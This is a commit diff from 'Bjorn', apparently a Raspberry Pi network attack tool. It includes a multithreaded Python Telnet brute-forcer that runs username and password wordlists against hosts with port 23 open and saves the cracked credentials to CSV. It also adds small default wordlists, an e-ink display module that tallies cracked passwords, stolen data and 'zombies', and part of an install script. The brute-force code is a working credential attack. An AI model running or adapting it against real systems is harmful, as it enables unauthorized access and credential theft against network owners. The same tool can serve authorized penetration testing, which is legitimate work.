self.users = open(shared_data.usersfile, "r").read().splitlines()
self.passwords = open(shared_data.passwordsfile, "r").read().splitlines()
self.lock = threading.Lock()
self.telnetfile = shared_data.telnetfile
# If the file does not exist, it will be created
if not os.path.exists(self.telnetfile):
logger.info(f"File {self.telnetfile} does not exist. Creating...")
with open(self.telnetfile, "w") as f:
f.write("MAC Address,IP Address,Hostname,User,Password,Port\n")
self.results = [] # List to store results temporarily
self.queue = Queue()
self.console = Console()
def load_scan_file(self):
"""
Load the netkb file and filter it for Telnet ports.
"""
self.scan = pd.read_csv(self.shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("23", na=False)]
def telnet_connect(self, adresse_ip, user, password):
"""
Establish a Telnet connection and try to log in with the provided credentials.
"""
try:
tn = telnetlib.Telnet(adresse_ip)
tn.read_until(b"login: ", timeout=5)
tn.write(user.encode('ascii') + b"\n")
if password:
tn.read_until(b"Password: ", timeout=5)
tn.write(password.encode('ascii') + b"\n")
# Wait to see if the login was successful
time.sleep(2)
response = tn.expect([b"Login incorrect", b"Password: ", b"$ ", b"# "], timeout=5)
tn.close()
# Check if the login was successful
if response[0] == 2 or response[0] == 3:
return True
except Exception as e:
pass
return False
def worker(self, progress, task_id, success_flag):
"""
Worker thread to process items in the queue.
"""
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping worker thread.")
break
adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
if self.telnet_connect(adresse_ip, user, password):
with self.lock:
self.results.append([mac_address, adresse_ip, hostname, user, password, port])
logger.success(f"Found credentials IP: {adresse_ip} | User: {user} | Password: {password}")
self.save_results()
self.removeduplicates()
success_flag[0] = True
self.queue.task_done()
progress.update(task_id, advance=1)
def run_bruteforce(self, adresse_ip, port):
self.load_scan_file() # Reload the scan file to get the latest IPs and ports
mac_address = self.scan.loc[self.scan['IPs'] == adresse_ip, 'MAC Address'].values[0]
hostname = self.scan.loc[self.scan['IPs'] == adresse_ip, 'Hostnames'].values[0]
total_tasks = len(self.users) * len(self.passwords)
for user in self.users:
for password in self.passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return False, []
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
success_flag = [False]
threads = []
with Progress(SpinnerColumn(), TextColumn("[progress.description]{task.description}"), BarColumn(), TextColumn("[progress.percentage]{task.percentage:>3.0f}%")) as progress:
task_id = progress.add_task("[cyan]Bruteforcing Telnet...", total=total_tasks)
for _ in range(40): # Adjust the number of threads based on the RPi Zero's capabilities
t = threading.Thread(target=self.worker, args=(progress, task_id, success_flag))
t.start()
threads.append(t)
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce.")
while not self.queue.empty():
self.queue.get()
self.queue.task_done()
break
self.queue.join()
for t in threads:
t.join()
return success_flag[0], self.results # Return True and the list of successes if at least one attempt was successful
def save_results(self):
"""
Save the results of successful login attempts to a CSV file.
"""
df = pd.DataFrame(self.results, columns=['MAC Address', 'IP Address', 'Hostname', 'User', 'Password', 'Port'])
df.to_csv(self.telnetfile, index=False, mode='a', header=not os.path.exists(self.telnetfile))
self.results = [] # Reset temporary results after saving
def removeduplicates(self):
"""
Remove duplicate entries from the results file.
"""
df = pd.read_csv(self.telnetfile)
df.drop_duplicates(inplace=True)
df.to_csv(self.telnetfile, index=False)
if __name__ == "__main__":
shared_data = SharedData()
try:
telnet_bruteforce = TelnetBruteforce(shared_data)
logger.info("Starting Telnet brute-force attack on port 23...")
# Load the netkb file and get the IPs to scan
ips_to_scan = shared_data.read_data()
# Execute the brute-force attack on each IP
for row in ips_to_scan:
ip = row["IPs"]
logger.info(f"Executing TelnetBruteforce on {ip}...")
telnet_bruteforce.execute(ip, b_port, row, b_status)
logger.info(f"Total number of successes: {len(telnet_bruteforce.telnet_connector.results)}")
exit(len(telnet_bruteforce.telnet_connector.results))
except Exception as e:
logger.error(f"Error: {e}")

71
comment.py Normal file
View File

@@ -0,0 +1,71 @@
# comment.py
# This module defines the `Commentaireia` class, which provides context-based random comments.
# The comments are based on various themes such as "IDLE", "SCANNER", and others, to simulate
# different states or actions within a network scanning and security context. The class uses a
# shared data object to determine delays between comments and switches themes based on the current
# state. The `get_commentaire` method returns a random comment from the specified theme, ensuring
# comments are not repeated too frequently.
import random
import time
import logging
import json
from init_shared import shared_data
from logger import Logger
import os
logger = Logger(name="comment.py", level=logging.DEBUG)
class Commentaireia:
"""Provides context-based random comments for bjorn."""
def __init__(self):
self.shared_data = shared_data
self.last_comment_time = 0 # Initialize last_comment_time
self.comment_delay = random.randint(self.shared_data.comment_delaymin, self.shared_data.comment_delaymax) # Initialize comment_delay
self.last_theme = None # Initialize last_theme
self.themes = self.load_comments(self.shared_data.commentsfile) # Load themes from JSON file
def load_comments(self, commentsfile):
"""Load comments from a JSON file."""
cache_file = commentsfile + '.cache'
# Check if a cached version exists and is newer than the original file
if os.path.exists(cache_file) and os.path.getmtime(cache_file) >= os.path.getmtime(commentsfile):
try:
with open(cache_file, 'r') as file:
comments_data = json.load(file)
logger.info("Comments loaded successfully from cache.")
return comments_data
except (FileNotFoundError, json.JSONDecodeError):
logger.warning("Cache file is corrupted or not found. Loading from the original file.")
# Load from the original file if cache is not used or corrupted
try:
with open(commentsfile, 'r') as file:
comments_data = json.load(file)
logger.info("Comments loaded successfully from JSON file.")
# Save to cache
with open(cache_file, 'w') as cache:
json.dump(comments_data, cache)
return comments_data
except FileNotFoundError:
logger.error(f"The file '{commentsfile}' was not found.")
return {"IDLE": ["Default comment, no comments file found."]} # Fallback to a default theme
except json.JSONDecodeError:
logger.error(f"The file '{commentsfile}' is not a valid JSON file.")
return {"IDLE": ["Default comment, invalid JSON format."]} # Fallback to a default theme
def get_commentaire(self, theme):
""" This method returns a random comment based on the specified theme."""
current_time = time.time() # Get the current time in seconds
if theme != self.last_theme or current_time - self.last_comment_time >= self.comment_delay: # Check if the theme has changed or if the delay has expired
self.last_comment_time = current_time # Update the last comment time
self.last_theme = theme # Update the last theme
if theme not in self.themes:
logger.warning(f"The theme '{theme}' is not defined, using the default theme IDLE.")
theme = "IDLE"
return random.choice(self.themes[theme]) # Return a random comment based on the specified theme
else:
return None

View File

@@ -0,0 +1,3 @@
root
admin
bjorn

View File

@@ -0,0 +1,3 @@
root
admin
bjorn

385
display.py Normal file
View File

@@ -0,0 +1,385 @@
#display.py
# Description:
# This file, display.py, is responsible for managing the e-ink display of the Bjorn project, updating it with relevant data and statuses.
# It initializes the display, manages multiple threads for updating shared data and vulnerability counts, and handles the rendering of information
# and images on the display.
#
# Key functionalities include:
# - Initializing the e-ink display (EPD) and handling any errors during initialization.
# - Creating and managing threads to periodically update shared data and vulnerability counts.
# - Rendering various statistics, status icons, and images on the e-ink display.
# - Handling updates to shared data from various sources, including CSV files and system commands.
# - Checking and displaying the status of Bluetooth, Wi-Fi, PAN, and USB connections.
# - Providing methods to update the display with comments from an AI (Commentaireia) and generating images dynamically.
import threading
import time
import os
import pandas as pd
import signal
import glob
import logging
import random
import sys
from PIL import Image, ImageDraw
from init_shared import shared_data
from comment import Commentaireia
from logger import Logger
import subprocess
logger = Logger(name="display.py", level=logging.DEBUG)
class Display:
def __init__(self, shared_data):
"""Initialize the display and start the main image and shared data update threads."""
self.shared_data = shared_data
self.shared_data.bjornstatustext2 = "Awakening..."
self.commentaire_ia = Commentaireia()
self.semaphore = threading.Semaphore(10)
self.screen_reversed = self.shared_data.screen_reversed
self.web_screen_reversed = self.shared_data.web_screen_reversed
try:
self.epd_helper = self.shared_data.epd_helper
self.epd_helper.init_partial_update()
logger.info("Display initialization complete.")
except Exception as e:
logger.error(f"Error during display initialization: {e}")
raise
self.main_image_thread = threading.Thread(target=self.update_main_image)
self.main_image_thread.daemon = True
self.main_image_thread.start()
self.update_shared_data_thread = threading.Thread(target=self.schedule_update_shared_data)
self.update_shared_data_thread.daemon = True
self.update_shared_data_thread.start()
self.update_vuln_count_thread = threading.Thread(target=self.schedule_update_vuln_count)
self.update_vuln_count_thread.daemon = True
self.update_vuln_count_thread.start()
self.scale_factor_x = self.shared_data.scale_factor_x
self.scale_factor_y = self.shared_data.scale_factor_y
def schedule_update_shared_data(self):
"""Periodically update the shared data with the latest system information."""
while not self.shared_data.display_should_exit:
self.update_shared_data()
time.sleep(25)
def schedule_update_vuln_count(self):
"""Periodically update the vulnerability count on the display."""
while not self.shared_data.display_should_exit:
self.update_vuln_count()
time.sleep(300)
def update_main_image(self):
"""Update the main image on the display with the latest immagegen data."""
while not self.shared_data.display_should_exit:
try:
self.shared_data.update_image_randomizer()
if self.shared_data.imagegen:
self.main_image = self.shared_data.imagegen
else:
logger.error("No image generated for current status.")
time.sleep(random.uniform(self.shared_data.image_display_delaymin, self.shared_data.image_display_delaymax))
except Exception as e:
logger.error(f"An error occurred in update_main_image: {e}")
def get_open_files(self):
"""Get the number of open FD files on the system."""
try:
open_files = len(glob.glob('/proc/*/fd/*'))
logger.debug(f"FD : {open_files}")
return open_files
except Exception as e:
logger.error(f"Error getting open files: {e}")
return None
def update_vuln_count(self):
"""Update the vulnerability count on the display."""
with self.semaphore:
try:
if not os.path.exists(self.shared_data.vuln_summary_file):
# Create the file with the necessary columns if it does not exist
df = pd.DataFrame(columns=["IP", "Hostname", "MAC Address", "Port", "Vulnerabilities"])
df.to_csv(self.shared_data.vuln_summary_file, index=False)
self.shared_data.vulnnbr = 0
logger.info("Vulnerability summary file created.")
else:
# Load the netkbfile to check for "Alive" IPs
if os.path.exists(self.shared_data.netkbfile):
with open(self.shared_data.netkbfile, 'r') as file:
netkb_df = pd.read_csv(file)
alive_macs = set(netkb_df[(netkb_df["Alive"] == 1) & (netkb_df["MAC Address"] != "STANDALONE")]["MAC Address"]) # Get all alive MACs based on the 'Alive' column and ignore "STANDALONE"
else:
alive_macs = set()
with open(self.shared_data.vuln_summary_file, 'r') as file:
df = pd.read_csv(file)
all_vulnerabilities = set()
for index, row in df.iterrows():
mac_address = row["MAC Address"]
if mac_address in alive_macs and mac_address != "STANDALONE": # Ignore "STANDALONE" MAC addresses
vulnerabilities = row["Vulnerabilities"]
if pd.isna(vulnerabilities) or not isinstance(vulnerabilities, str): # Check if vulnerabilities is NaN or not a string
# logger.debug(f"No valid vulnerabilities for MAC Address: {mac_address}")
continue
if vulnerabilities and isinstance(vulnerabilities, str):
all_vulnerabilities.update(vulnerabilities.split("; ")) # Add the vulnerabilities to the set
self.shared_data.vulnnbr = len(all_vulnerabilities)
logger.debug(f"Updated vulnerabilities count: {self.shared_data.vulnnbr}")
# Update the livestatusfile
if os.path.exists(self.shared_data.livestatusfile):
with open(self.shared_data.livestatusfile, 'r+') as livestatus_file:
livestatus_df = pd.read_csv(livestatus_file)
livestatus_df.loc[0, 'Vulnerabilities Count'] = self.shared_data.vulnnbr
livestatus_df.to_csv(self.shared_data.livestatusfile, index=False)
logger.debug(f"Updated livestatusfile with vulnerability count: {self.shared_data.vulnnbr}")
else:
logger.error(f"Livestatusfile {self.shared_data.livestatusfile} does not exist.")
except Exception as e:
logger.error(f"An error occurred in update_vuln_count: {e}")
def update_shared_data(self):
"""Update the shared data with the latest system information."""
with self.semaphore:
"""
Update shared data from CSV files live_status.csv and cracked_passwords.csv.
"""
try:
with open(self.shared_data.livestatusfile, 'r') as file:
livestatus_df = pd.read_csv(file)
self.shared_data.portnbr = livestatus_df['Total Open Ports'].iloc[0] # Get the total number of open ports
self.shared_data.targetnbr = livestatus_df['Alive Hosts Count'].iloc[0] # Get the total number of alive hosts
self.shared_data.networkkbnbr = livestatus_df['All Known Hosts Count'].iloc[0] # Get the total number of known hosts
self.shared_data.vulnnbr = livestatus_df['Vulnerabilities Count'].iloc[0] # Get the total number of vulnerable ports
crackedpw_files = glob.glob(f"{self.shared_data.crackedpwddir}/*.csv") # Get all CSV files in the cracked password directory
total_passwords = 0
for file in crackedpw_files:
with open(file, 'r') as f:
total_passwords += len(pd.read_csv(f, usecols=[0]))
self.shared_data.crednbr = total_passwords # Set the total number of cracked passwords to shared data
total_data = sum([len(files) for r, d, files in os.walk(self.shared_data.datastolendir)]) # Get the total number of data files in the data store directory
self.shared_data.datanbr = total_data
total_zombies = sum([len(files) for r, d, files in os.walk(self.shared_data.zombiesdir)]) # Get the total number of zombies in the zombies directory
self.shared_data.zombiesnbr = total_zombies
total_attacks = sum([len(files) for r, d, files in os.walk(self.shared_data.actions_dir) if not r.endswith("__pycache__")]) - 2
self.shared_data.attacksnbr = total_attacks
self.shared_data.update_stats()
# Update Bluetooth, WiFi, and PAN connection status
self.shared_data.manual_mode = self.is_manual_mode()
if self.shared_data.manual_mode:
self.manual_mode_txt = "M"
else:
self.manual_mode_txt = "A"
# # self.shared_data.bluetooth_active = self.is_bluetooth_connected()
self.shared_data.wifi_connected = self.is_wifi_connected()
self.shared_data.usb_active = self.is_usb_connected()
########self.shared_data.pan_connected = self.is_interface_connected('pan0') or self.is_interface_connected('usb0')
self.get_open_files()
except (FileNotFoundError, pd.errors.EmptyDataError) as e:
logger.error(f"Error: {e}")
except Exception as e:
logger.error(f"Error updating shared data: {e}")
def display_comment(self, status):
""" Display the comment based on the status of the BjornOrch. """
comment = self.commentaire_ia.get_commentaire(status) # Get the comment from Commentaireia
if comment:
self.shared_data.bjornsay = comment # Set the comment to shared data
self.shared_data.bjornstatustext = self.shared_data.bjornorch_status # Set the status to shared data
else:
pass
# # # def is_bluetooth_connected(self):
# # # """
# # # Check if any device is connected to the Bluetooth (pan0) interface by checking the output of 'ip neigh show dev pan0'.
# # # """
# # # try:
# # # result = subprocess.Popen(['ip', 'neigh', 'show', 'dev', 'pan0'], stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)
# # # output, error = result.communicate()
# # # if result.returncode != 0:
# # # logger.error(f"Error executing 'ip neigh show dev pan0': {error}")
# # # return False
# # # return bool(output.strip())
# # # except Exception as e:
# # # logger.error(f"Error checking Bluetooth connection status: {e}")
# # # return False
def is_wifi_connected(self):
"""
Check if WiFi is connected by checking the current SSID.
"""
try:
result = subprocess.Popen(['iwgetid', '-r'], stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)
ssid, error = result.communicate()
if result.returncode != 0:
logger.error(f"Error executing 'iwgetid -r': {error}")
return False
return bool(ssid.strip()) # Return True if connected to a WiFi network
except Exception as e:
logger.error(f"Error checking WiFi status: {e}")
return False
def is_manual_mode(self):
"""Check if the BjornOrch is in manual mode."""
return self.shared_data.manual_mode
def is_interface_connected(self, interface):
"""
Check if any device is connected to the specified interface (pan0 or usb0)
by checking the output of 'ip neigh show dev <interface>'.
"""
try:
result = subprocess.Popen(['ip', 'neigh', 'show', 'dev', interface], stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)
output, error = result.communicate()
if result.returncode != 0:
logger.error(f"Error executing 'ip neigh show dev {interface}': {error}")
return False
return bool(output.strip())
except Exception as e:
logger.error(f"Error checking connection status on {interface}: {e}")
return False
def is_usb_connected(self):
"""
Check if any device is connected to the USB (usb0) interface by checking the output of 'ip neigh show dev usb0'.
"""
try:
result = subprocess.Popen(['ip', 'neigh', 'show', 'dev', 'usb0'], stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)
output, error = result.communicate()
if result.returncode != 0:
logger.error(f"Error executing 'ip neigh show dev usb0': {error}")
return False
return bool(output.strip())
except Exception as e:
logger.error(f"Error checking USB connection status: {e}")
return False
def run(self):
"""
Main loop for updating the EPD display with shared data.
"""
self.manual_mode_txt = ""
while not self.shared_data.display_should_exit:
try:
self.epd_helper.init_partial_update()
self.display_comment(self.shared_data.bjornorch_status) # Display the comment
image = Image.new('1', (self.shared_data.width, self.shared_data.height))
draw = ImageDraw.Draw(image)
draw.rectangle((0, 0, self.shared_data.width, self.shared_data.height), fill=255)
draw.text((int(37 * self.scale_factor_x), int(5 * self.scale_factor_y)), "BJORN", font=self.shared_data.font_viking, fill=0)
draw.text((int(110 * self.scale_factor_x), int(170 * self.scale_factor_y)), self.manual_mode_txt, font=self.shared_data.font_arial14, fill=0)
if self.shared_data.wifi_connected:
image.paste(self.shared_data.wifi, (int(3 * self.scale_factor_x), int(3 * self.scale_factor_y)))
# # # if self.shared_data.bluetooth_active:
# # # image.paste(self.shared_data.bluetooth, (int(23 * self.scale_factor_x), int(4 * self.scale_factor_y)))
if self.shared_data.pan_connected:
image.paste(self.shared_data.connected, (int(104 * self.scale_factor_x), int(3 * self.scale_factor_y)))
if self.shared_data.usb_active:
image.paste(self.shared_data.usb, (int(90 * self.scale_factor_x), int(4 * self.scale_factor_y)))
stats = [
(self.shared_data.target, (int(8 * self.scale_factor_x), int(22 * self.scale_factor_y)), (int(28 * self.scale_factor_x), int(22 * self.scale_factor_y)), str(self.shared_data.targetnbr)),
(self.shared_data.port, (int(47 * self.scale_factor_x), int(22 * self.scale_factor_y)), (int(67 * self.scale_factor_x), int(22 * self.scale_factor_y)), str(self.shared_data.portnbr)),
(self.shared_data.vuln, (int(86 * self.scale_factor_x), int(22 * self.scale_factor_y)), (int(106 * self.scale_factor_x), int(22 * self.scale_factor_y)), str(self.shared_data.vulnnbr)),
(self.shared_data.cred, (int(8 * self.scale_factor_x), int(41 * self.scale_factor_y)), (int(28 * self.scale_factor_x), int(41 * self.scale_factor_y)), str(self.shared_data.crednbr)),
(self.shared_data.money, (int(3 * self.scale_factor_x), int(172 * self.scale_factor_y)), (int(3 * self.scale_factor_x), int(192 * self.scale_factor_y)), str(self.shared_data.coinnbr)),
(self.shared_data.level, (int(2 * self.scale_factor_x), int(217 * self.scale_factor_y)), (int(4 * self.scale_factor_x), int(237 * self.scale_factor_y)), str(self.shared_data.levelnbr)),
(self.shared_data.zombie, (int(47 * self.scale_factor_x), int(41 * self.scale_factor_y)), (int(67 * self.scale_factor_x), int(41 * self.scale_factor_y)), str(self.shared_data.zombiesnbr)),
(self.shared_data.networkkb, (int(102 * self.scale_factor_x), int(190 * self.scale_factor_y)), (int(102 * self.scale_factor_x), int(208 * self.scale_factor_y)), str(self.shared_data.networkkbnbr)),
(self.shared_data.data, (int(86 * self.scale_factor_x), int(41 * self.scale_factor_y)), (int(106 * self.scale_factor_x), int(41 * self.scale_factor_y)), str(self.shared_data.datanbr)),
(self.shared_data.attacks, (int(100 * self.scale_factor_x), int(218 * self.scale_factor_y)), (int(102 * self.scale_factor_x), int(237 * self.scale_factor_y)), str(self.shared_data.attacksnbr)),
]
for img, img_pos, text_pos, text in stats:
image.paste(img, img_pos)
draw.text(text_pos, text, font=self.shared_data.font_arial9, fill=0)
self.shared_data.update_bjornstatus()
image.paste(self.shared_data.bjornstatusimage, (int(3 * self.scale_factor_x), int(60 * self.scale_factor_y)))
draw.text((int(35 * self.scale_factor_x), int(65 * self.scale_factor_y)), self.shared_data.bjornstatustext, font=self.shared_data.font_arial9, fill=0)
draw.text((int(35 * self.scale_factor_x), int(75 * self.scale_factor_y)), self.shared_data.bjornstatustext2, font=self.shared_data.font_arial9, fill=0)
image.paste(self.shared_data.frise, (int(0 * self.scale_factor_x), int(160 * self.scale_factor_y)))
draw.rectangle((1, 1, self.shared_data.width - 1, self.shared_data.height - 1), outline=0)
draw.line((1, 20, self.shared_data.width - 1, 20), fill=0)
draw.line((1, 59, self.shared_data.width - 1, 59), fill=0)
draw.line((1, 87, self.shared_data.width - 1, 87), fill=0)
lines = self.shared_data.wrap_text(self.shared_data.bjornsay, self.shared_data.font_arialbold, self.shared_data.width - 4)
y_text = int(90 * self.scale_factor_y)
if self.main_image is not None:
image.paste(self.main_image, (self.shared_data.x_center1, self.shared_data.y_bottom1))
else:
logger.error("Main image not found in shared_data.")
for line in lines:
draw.text((int(4 * self.scale_factor_x), y_text), line, font=self.shared_data.font_arialbold, fill=0) # Display the comment
y_text += (self.shared_data.font_arialbold.getbbox(line)[3] - self.shared_data.font_arialbold.getbbox(line)[1]) + 3 # Calculate the height of the text depending on the font size, 3 means the space between lines
if self.screen_reversed:
image = image.transpose(Image.ROTATE_180)
self.epd_helper.display_partial(image)
self.epd_helper.display_partial(image)
if self.web_screen_reversed:
image = image.transpose(Image.ROTATE_180)
with open(os.path.join(self.shared_data.webdir, "screen.png"), 'wb') as img_file:
image.save(img_file)
img_file.flush()
os.fsync(img_file.fileno())
time.sleep(self.shared_data.screen_delay)
except Exception as e:
logger.error(f"An exception occurred: {e}")
def handle_exit_display(signum, frame, display_thread):
"""Handle the exit signal and close the display."""
global should_exit
shared_data.display_should_exit = True
logger.info("Exit signal received. Waiting for the main loop to finish...")
try:
if main_loop and main_loop.epd:
main_loop.epd.init(main_loop.epd.sleep)
main_loop.epd.Dev_exit()
except Exception as e:
logger.error(f"Error while closing the display: {e}")
display_thread.join()
logger.info("Main loop finished. Clean exit.")
sys.exit(0) # Used sys.exit(0) instead of exit(0)
# Declare main_loop globally
main_loop = None
if __name__ == "__main__":
try:
logger.info("Starting main loop...")
main_loop = Display(shared_data)
display_thread = threading.Thread(target=main_loop.run)
display_thread.start()
logger.info("Main loop started.")
signal.signal(signal.SIGINT, lambda signum, frame: handle_exit_display(signum, frame, display_thread))
signal.signal(signal.SIGTERM, lambda signum, frame: handle_exit_display(signum, frame, display_thread))
except Exception as e:
logger.error(f"An exception occurred during program execution: {e}")
handle_exit_display(signal.SIGINT, None, display_thread)
sys.exit(1) # Used sys.exit(1) instead of exit(1)

68
epd_helper.py Normal file
View File

@@ -0,0 +1,68 @@
# epd_helper.py
import importlib
import logging
logger = logging.getLogger(__name__)
class EPDHelper:
def __init__(self, epd_type):
self.epd_type = epd_type
self.epd = self._load_epd_module()
def _load_epd_module(self):
try:
epd_module_name = f'resources.waveshare_epd.{self.epd_type}'
epd_module = importlib.import_module(epd_module_name)
return epd_module.EPD()
except ImportError as e:
logger.error(f"EPD module {self.epd_type} not found: {e}")
raise
except Exception as e:
logger.error(f"Error loading EPD module {self.epd_type}: {e}")
raise
def init_full_update(self):
try:
if hasattr(self.epd, 'FULL_UPDATE'):
self.epd.init(self.epd.FULL_UPDATE)
elif hasattr(self.epd, 'lut_full_update'):
self.epd.init(self.epd.lut_full_update)
else:
self.epd.init()
logger.info("EPD full update initialization complete.")
except Exception as e:
logger.error(f"Error initializing EPD for full update: {e}")
raise
def init_partial_update(self):
try:
if hasattr(self.epd, 'PART_UPDATE'):
self.epd.init(self.epd.PART_UPDATE)
elif hasattr(self.epd, 'lut_partial_update'):
self.epd.init(self.epd.lut_partial_update)
else:
self.epd.init()
logger.info("EPD partial update initialization complete.")
except Exception as e:
logger.error(f"Error initializing EPD for partial update: {e}")
raise
def display_partial(self, image):
try:
if hasattr(self.epd, 'displayPartial'):
self.epd.displayPartial(self.epd.getbuffer(image))
else:
self.epd.display(self.epd.getbuffer(image))
logger.info("Partial display update complete.")
except Exception as e:
logger.error(f"Error during partial display update: {e}")
raise
def clear(self):
try:
self.epd.Clear()
logger.info("EPD cleared.")
except Exception as e:
logger.error(f"Error clearing EPD: {e}")
raise

13
init_shared.py Normal file
View File

@@ -0,0 +1,13 @@
#init_shared.py
# Description:
# This file, init_shared.py, is responsible for initializing and providing access to shared data across different modules in the Bjorn project.
#
# Key functionalities include:
# - Importing the `SharedData` class from the `shared` module.
# - Creating an instance of `SharedData` named `shared_data` that holds common configuration, paths, and other resources.
# - Ensuring that all modules importing `shared_data` will have access to the same instance, promoting consistency and ease of data management throughout the project.
from shared import SharedData
shared_data = SharedData()

596
install_bjorn.sh Normal file
View File

@@ -0,0 +1,596 @@
#!/bin/bash
# BJORN Installation Script
# This script handles the complete installation of BJORN
# Author: infinition
# Version: 1.0 - 071124 - 0954
# Colors for output
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
NC='\033[0m'
# Logging configuration
LOG_DIR="/var/log/bjorn_install"
mkdir -p "$LOG_DIR"
LOG_FILE="$LOG_DIR/bjorn_install_$(date +%Y%m%d_%H%M%S).log"
VERBOSE=false
# Global variables
BJORN_USER="bjorn"
BJORN_PATH="/home/${BJORN_USER}/Bjorn"
CURRENT_STEP=0
TOTAL_STEPS=8
if [[ "$1" == "--help" ]]; then
echo "Usage: sudo ./install_bjorn.sh"
echo "Make sure you have the necessary permissions and that all dependencies are met."
exit 0
fi
# Function to display progress
show_progress() {
echo -e "${BLUE}Step $CURRENT_STEP of $TOTAL_STEPS: $1${NC}"
}
# Logging function
log() {
local level=$1
shift
local message="[$(date '+%Y-%m-%d %H:%M:%S')] [$level] $*"
echo -e "$message" >> "$LOG_FILE"
if [ "$VERBOSE" = true ] || [ "$level" != "DEBUG" ]; then
case $level in
"ERROR") echo -e "${RED}$message${NC}" ;;
"SUCCESS") echo -e "${GREEN}$message${NC}" ;;
"WARNING") echo -e "${YELLOW}$message${NC}" ;;
"INFO") echo -e "${BLUE}$message${NC}" ;;
*) echo -e "$message" ;;
esac
fi
}
# Error handling function
handle_error() {
local error_code=$?
local error_message=$1
log "ERROR" "An error occurred during: $error_message (Error code: $error_code)"
log "ERROR" "Check the log file for details: $LOG_FILE"
echo -e "\n${RED}Would you like to:"
echo "1. Retry this step"
echo "2. Skip this step (not recommended)"
echo "3. Exit installation${NC}"
read -r choice
case $choice in
1) return 1 ;; # Retry
2) return 0 ;; # Skip
3) clean_exit 1 ;; # Exit
*) handle_error "$error_message" ;; # Invalid choice
esac
}
# Function to check command success
check_success() {
if [ $? -eq 0 ]; then
log "SUCCESS" "$1"
return 0
else
handle_error "$1"
return $?
fi
}
# # Check system compatibility
# check_system_compatibility() {
# log "INFO" "Checking system compatibility..."
# # Check if running on Raspberry Pi
# if ! grep -q "Raspberry Pi" /proc/cpuinfo; then
# log "WARNING" "This system might not be a Raspberry Pi. Continue anyway? (y/n)"
# read -r response
# if [[ ! "$response" =~ ^[Yy]$ ]]; then
# clean_exit 1
# fi
# fi
# check_success "System compatibility check completed"
# }
# Check system compatibility
check_system_compatibility() {
log "INFO" "Checking system compatibility..."
local should_ask_confirmation=false
# Check if running on Raspberry Pi
if ! grep -q "Raspberry Pi" /proc/cpuinfo; then
log "WARNING" "This system might not be a Raspberry Pi"
should_ask_confirmation=true
fi
# Check RAM (Raspberry Pi Zero has 512MB RAM)
total_ram=$(free -m | awk '/^Mem:/{print $2}')
if [ "$total_ram" -lt 429 ]; then
log "WARNING" "Low RAM detected. Required: 512MB, Found: ${total_ram}MB"
echo -e "${YELLOW}Your system has less RAM than recommended. This might affect performance.${NC}"
should_ask_confirmation=true
else
log "SUCCESS" "RAM check passed: ${total_ram}MB available"
fi
# Check available disk space
available_space=$(df -m /home | awk 'NR==2 {print $4}')
if [ "$available_space" -lt 1024 ]; then
log "WARNING" "Low disk space. Recommended: 1GB, Found: ${available_space}MB"
echo -e "${YELLOW}Your system has less free space than recommended. This might affect installation.${NC}"
should_ask_confirmation=true
else
log "SUCCESS" "Disk space check passed: ${available_space}MB available"
fi
# Check OS version
if [ -f "/etc/os-release" ]; then
source /etc/os-release
# Verify if it's Raspbian
if [ "$NAME" != "Raspbian GNU/Linux" ]; then
log "WARNING" "Different OS detected. Recommended: Raspbian GNU/Linux, Found: ${NAME}"
echo -e "${YELLOW}Your system is not running Raspbian GNU/Linux.${NC}"
should_ask_confirmation=true
fi
# Compare versions (expecting Bookworm = 12)
expected_version="12"
if [ "$VERSION_ID" != "$expected_version" ]; then
log "WARNING" "Different OS version detected"
echo -e "${YELLOW}This script was tested with Raspbian GNU/Linux 12 (bookworm)${NC}"
echo -e "${YELLOW}Current system: ${PRETTY_NAME}${NC}"
if [ "$VERSION_ID" -lt "$expected_version" ]; then
echo -e "${YELLOW}Your system version ($VERSION_ID) is older than recommended ($expected_version)${NC}"
elif [ "$VERSION_ID" -gt "$expected_version" ]; then
echo -e "${YELLOW}Your system version ($VERSION_ID) is newer than tested ($expected_version)${NC}"
fi
should_ask_confirmation=true
else
log "SUCCESS" "OS version check passed: ${PRETTY_NAME}"
fi
else
log "WARNING" "Could not determine OS version (/etc/os-release not found)"
should_ask_confirmation=true
fi
# Check if system is 32-bit ARM (armhf)
architecture=$(dpkg --print-architecture)
if [ "$architecture" != "armhf" ]; then
log "WARNING" "Different architecture detected. Expected: armhf, Found: ${architecture}"
echo -e "${YELLOW}This script was tested with armhf architecture${NC}"
should_ask_confirmation=true
fi
# Additional Pi Zero specific checks if possible
if ! (grep -q "Pi Zero" /proc/cpuinfo || grep -q "BCM2835" /proc/cpuinfo); then
log "WARNING" "Could not confirm if this is a Raspberry Pi Zero"
echo -e "${YELLOW}This script was designed for Raspberry Pi Zero${NC}"
should_ask_confirmation=true
else
log "SUCCESS" "Raspberry Pi Zero detected"
fi
if [ "$should_ask_confirmation" = true ]; then
echo -e "\n${YELLOW}Some system compatibility warnings were detected (see above).${NC}"
echo -e "${YELLOW}The installation might not work as expected.${NC}"
echo -e "${YELLOW}Do you want to continue anyway? (y/n)${NC}"
read -r response
if [[ ! "$response" =~ ^[Yy]$ ]]; then
log "INFO" "Installation aborted by user after compatibility warnings"
clean_exit 1
fi
else
log "SUCCESS" "All compatibility checks passed"
fi
log "INFO" "System compatibility check completed"
return 0
}
# Install system dependencies
install_dependencies() {
log "INFO" "Installing system dependencies..."
# Update package list
apt-get update
# List of required packages based on README
packages=(
"python3-pip"
"wget"
"lsof"
"git"
"libopenjp2-7"
"nmap"
"libopenblas-dev"
"bluez-tools"
"bluez"
"dhcpcd5"
"bridge-utils"
"python3-pil"
"libjpeg-dev"
"zlib1g-dev"
"libpng-dev"
"python3-dev"
"libffi-dev"
"libssl-dev"
"libgpiod-dev"
"libi2c-dev"
"libatlas-base-dev"
"build-essential"
)
# Install packages
